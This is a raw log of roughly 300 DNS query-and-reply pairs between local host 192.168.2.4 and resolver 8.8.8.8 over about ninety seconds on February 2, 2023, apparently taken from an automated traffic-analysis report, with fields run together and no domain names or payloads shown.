                                                                                                                                            Feb 2, 2023 21:18:23.214318991 CET5356253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:23.231780052 CET53535628.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:23.980293036 CET4966553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:23.998733997 CET53496658.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:24.450906038 CET5822553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:24.468556881 CET53582258.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:24.933141947 CET5472553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:24.951041937 CET53547258.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:25.433326006 CET5333253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:25.458830118 CET53533328.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:25.932605028 CET5472653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:25.950428963 CET53547268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:26.678611040 CET5812853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:26.696536064 CET53581288.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:27.166964054 CET6157953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:27.184268951 CET53615798.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:28.349351883 CET6543253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:28.369004011 CET53654328.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:28.851371050 CET4973553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:28.870137930 CET53497358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:29.393095970 CET6300053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:29.412874937 CET53630008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:30.233381033 CET5141853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:30.250514030 CET53514188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:30.934063911 CET6044253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:30.951838017 CET53604428.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:31.422344923 CET6330253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:31.439341068 CET53633028.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:31.889811993 CET6512753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:31.908967972 CET53651278.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:32.362930059 CET5485253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:32.380669117 CET53548528.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:32.837332964 CET5235153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:32.855344057 CET53523518.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:33.475529909 CET6194653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:33.495223045 CET53619468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:33.963814974 CET5090953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:33.984383106 CET53509098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:34.714102983 CET6164853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:34.733364105 CET53616488.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:35.196199894 CET5018653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:35.213921070 CET53501868.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:35.972194910 CET5777653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:35.991157055 CET53577768.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:36.448235989 CET5483053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:36.466129065 CET53548308.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:37.541754007 CET6475353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:37.560602903 CET53647538.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:38.012161970 CET6509953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:38.031743050 CET53650998.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:38.557245016 CET6394853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:38.575160027 CET53639488.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:39.055634975 CET5960553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:39.073873997 CET53596058.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:39.878312111 CET6516053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:39.895473003 CET53651608.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:40.381735086 CET6443053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:40.399327040 CET53644308.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:40.862077951 CET6347953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:40.881726027 CET53634798.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:41.344172955 CET6420953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:41.363183022 CET53642098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:41.828485966 CET6488353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:41.846842051 CET53648838.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:42.405930042 CET5743053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:42.425163031 CET53574308.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:42.894630909 CET5465253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:42.914683104 CET53546528.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:44.025203943 CET5243553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:44.044559956 CET53524358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:44.529158115 CET6161953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:44.547945976 CET53616198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:45.018851042 CET5919853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:45.038153887 CET53591988.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:45.520154953 CET6208453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:45.539743900 CET53620848.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:45.998142004 CET5804153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:46.016031981 CET53580418.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:46.780323982 CET5298653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:46.798070908 CET53529868.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:47.268290997 CET6385553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:47.287970066 CET53638558.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:47.749274015 CET4938153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:47.767106056 CET53493818.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:48.459582090 CET5867053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:48.481009007 CET53586708.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:48.934384108 CET5015753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:48.953059912 CET53501578.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:49.406881094 CET4979253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:49.427557945 CET53497928.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:49.901174068 CET5585553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:49.921036959 CET53558558.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:50.394463062 CET5284053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:50.411756039 CET53528408.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:50.870527983 CET5641853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:50.889853954 CET53564188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:51.341730118 CET6038453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:51.359636068 CET53603848.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:51.812439919 CET5914153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:51.831393957 CET53591418.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:52.320120096 CET6433453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:52.337311029 CET53643348.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:53.666529894 CET6133953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:53.683932066 CET53613398.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:54.147650003 CET5676053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:54.203874111 CET53567608.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:54.677465916 CET6244253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:54.696825027 CET53624428.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:55.154275894 CET6012153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:55.172012091 CET53601218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:56.160989046 CET6059853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:56.180046082 CET53605988.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:56.685585022 CET6393653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:56.702656984 CET53639368.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:57.540708065 CET6204753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:57.559700012 CET53620478.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:58.274857044 CET5638853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:58.293989897 CET53563888.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:58.760236979 CET6348953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:58.777975082 CET53634898.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:59.243019104 CET5696653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:59.260644913 CET53569668.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:00.269114971 CET5042653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:00.288098097 CET53504268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:00.828567982 CET5286053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:00.850075960 CET53528608.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:01.592289925 CET5712653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:01.611984015 CET53571268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:02.122286081 CET5003753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:02.140727997 CET53500378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:02.601735115 CET5889453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:02.622668028 CET53588948.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:03.079417944 CET6223453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:03.099140882 CET53622348.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:03.567053080 CET5768053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:03.584048986 CET53576808.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:04.051028013 CET6462453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:04.071101904 CET53646248.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:04.555200100 CET6355053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:04.572865009 CET53635508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:05.071281910 CET5911853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:05.088288069 CET53591188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:05.548815966 CET6075853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:05.568283081 CET53607588.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:06.015785933 CET6023853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:06.035361052 CET53602388.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:06.627175093 CET6371253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:06.646472931 CET53637128.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:07.118973970 CET5379053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:07.136226892 CET53537908.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:07.625185013 CET5382853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:07.644517899 CET53538288.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:08.385324955 CET6505153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:08.403070927 CET53650518.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:08.862154007 CET5154453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:08.879096031 CET53515448.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:09.328540087 CET6312553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:09.348018885 CET53631258.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:09.814903021 CET5295553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:09.832343102 CET53529558.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:10.304399014 CET5510053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:10.321615934 CET53551008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.017219067 CET5123253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:11.036003113 CET53512328.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.511560917 CET5641953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:11.531223059 CET53564198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:11.982359886 CET6324253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:12.001198053 CET53632428.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.469464064 CET5624353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:12.488678932 CET53562438.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:12.955943108 CET5332053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:12.973011971 CET53533208.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.428865910 CET6484753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:13.447926044 CET53648478.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:13.922076941 CET6257453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:13.941353083 CET53625748.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:14.674906015 CET5293753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:14.693547964 CET53529378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.437517881 CET6312153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:15.457062960 CET53631218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:15.922389030 CET5552653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:15.939611912 CET53555268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.397048950 CET6291653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:16.416594982 CET53629168.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:16.888860941 CET5625653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:16.906944036 CET53562568.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.493787050 CET6329453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:17.512903929 CET53632948.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:17.971503973 CET5958353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:17.989435911 CET53595838.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.074836969 CET5014053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:19.091898918 CET53501408.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:19.738254070 CET6100053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:19.758011103 CET53610008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.219921112 CET5418753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:20.238193989 CET53541878.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:20.993315935 CET5741853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:21.012856960 CET53574188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.469187975 CET6270853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:21.487422943 CET53627088.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:21.962685108 CET5704253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:21.980477095 CET53570428.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:22.440351009 CET5252653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:22.460053921 CET53525268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.288600922 CET5816853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:23.306943893 CET53581688.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:23.773469925 CET6075253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:23.791090965 CET53607528.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.261455059 CET4937953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:24.279118061 CET53493798.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:24.825319052 CET4963053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:24.844897032 CET53496308.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.300837040 CET5425153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:25.318572998 CET53542518.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:25.772694111 CET5342453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:25.792546034 CET53534248.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.266410112 CET5081553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:26.285401106 CET53508158.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:26.742197037 CET6407253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:26.761538982 CET53640728.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.229460955 CET5282953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:27.247343063 CET53528298.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:27.707123041 CET5266753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:27.724530935 CET53526678.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:28.193000078 CET6471253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:28.214098930 CET53647128.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.284495115 CET5706353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:29.301775932 CET53570638.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:29.969356060 CET5200153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:29.986756086 CET53520018.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.437196016 CET6164553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:30.456887960 CET53616458.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:30.907159090 CET6425053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:30.924612045 CET53642508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.382488012 CET4989553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:31.400177956 CET53498958.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:31.843544006 CET6314253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:31.861154079 CET53631428.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.314034939 CET6190953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:32.332925081 CET53619098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:32.805125952 CET4957153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:32.822410107 CET53495718.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:33.265085936 CET5048453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:33.284027100 CET53504848.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.208441019 CET5945053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:34.227726936 CET53594508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:34.690169096 CET5343553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:34.709217072 CET53534358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.402889013 CET5730553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:35.422610998 CET53573058.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:35.924177885 CET5252653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:35.943639040 CET53525268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.391515970 CET5610953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:36.410908937 CET53561098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:36.879017115 CET6470453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:36.896061897 CET53647048.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:37.359069109 CET6377153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:37.377902031 CET53637718.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.064024925 CET6517553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:38.081090927 CET53651758.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:38.533086061 CET5022153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:38.552761078 CET53502218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.126015902 CET6134153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:39.145114899 CET53613418.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:39.637967110 CET5531153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:39.657099962 CET53553118.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.116864920 CET4984653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:40.134665012 CET53498468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:40.596076012 CET5878253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:40.613415956 CET53587828.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.065854073 CET5784453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:41.082745075 CET53578448.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:41.536711931 CET6200353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:41.555470943 CET53620038.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.017083883 CET5808153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:42.036590099 CET53580818.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:42.682730913 CET5791453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:42.700438976 CET53579148.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.156552076 CET5991953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:43.175517082 CET53599198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:43.631649971 CET6034653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:43.650505066 CET53603468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.132312059 CET5745853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:44.151298046 CET53574588.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:44.611983061 CET5934153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:44.631617069 CET53593418.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.113126993 CET5813153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:45.130341053 CET53581318.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:45.598403931 CET6481153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:45.616009951 CET53648118.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.207345963 CET6113553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:46.224431992 CET53611358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:46.681526899 CET6276453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:46.701066971 CET53627648.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.157361031 CET6036553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:47.174391031 CET53603658.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:47.638366938 CET4920153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:47.657816887 CET53492018.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.114474058 CET5531453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:48.131767035 CET53553148.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:48.584099054 CET5594953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:48.603256941 CET53559498.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:49.667047024 CET6317853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:49.686642885 CET53631788.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.391196966 CET5640053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:50.410952091 CET53564008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:50.861761093 CET4988053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:50.878942013 CET53498808.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.336919069 CET5012153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:51.354249001 CET53501218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:51.802838087 CET5805853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:51.820861101 CET53580588.8.8.8192.168.2.4
